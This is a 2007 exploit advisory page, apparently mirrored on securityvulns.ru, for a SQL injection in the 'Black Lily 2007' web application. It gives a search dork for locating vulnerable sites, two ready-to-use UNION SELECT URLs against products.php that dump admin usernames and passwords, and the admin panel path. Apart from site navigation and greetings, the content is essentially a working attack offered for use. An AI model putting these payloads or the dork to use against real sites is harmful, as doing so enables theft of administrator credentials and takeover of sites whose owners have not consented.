Computer Security

Security Advisory: Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Sciurus Hosting Panel Code İnjection

  Myspace Clone Script (index.php) Remote File Inclusion Vulnerability

  net-finity (links.php) Remote SQL Injection Vulnerability

  JiRos Upload Manager SQL Injection

From:verys-secret_(at)_hotmail.com <verys-secret_(at)_hotmail.com>
Date:18.11.2007
Subject:Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability

#######################SnIper-sa.com################################
#                                                                  #
#  SSSSS      nnn        nn   ii  ppppppp  eeeeeeeee   rrrrr       #
# ss          nn nn      nn   ii  pp    p  ee          rr   rr     #
#s            nn  nn     nn   ii  pp    p  ee          rr     r    #
# ss          nn   nn    nn   ii  ppppppp  ee          rr   rr     #
#   sssss     nn    nn   nn   ii  pp       eeeeee      rrrr        #
#        ss   nn     nn  nn   ii  pp       ee          rrrr        #
#          s  nn      nn nn   ii  pp       ee          rr  rr      #
#        ss   nn        nnn   ii  pp       ee          rr   rr     #
#   sssss     nn        nnn   ii  pp       eeeeeeeeee  rr     rr   #
#                                                                  #
#####################VerY-SecReT####################################
####################################

found by :
              VerY SecReT
###########
HomePage : WwW.SnIpEr-Sa.Com
##################

Dork :  "Powered By The Black Lily 2007"
####################################

EXPLOIT:
 http://victim.com/ar/products.php?class=-1%20union%20select%201,2,
password,4,username%20from%20admin/*

or

http://victim.com/en/products.php?class=-1%20union%20select%201,2,3,
password,username%20from%20admin/*

########################################

Admin Panel is in  http://victim.com/xx/admin/

#####################################

S.GreetZ: sniper-sa.com & sniper-sa & Rafoo
#############################
thanx :  shoot3r , Devil-X ,ReMOTeR , and all sniper members

##############

contact-mail : SecReT@SecuRitY.Com.Sa
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru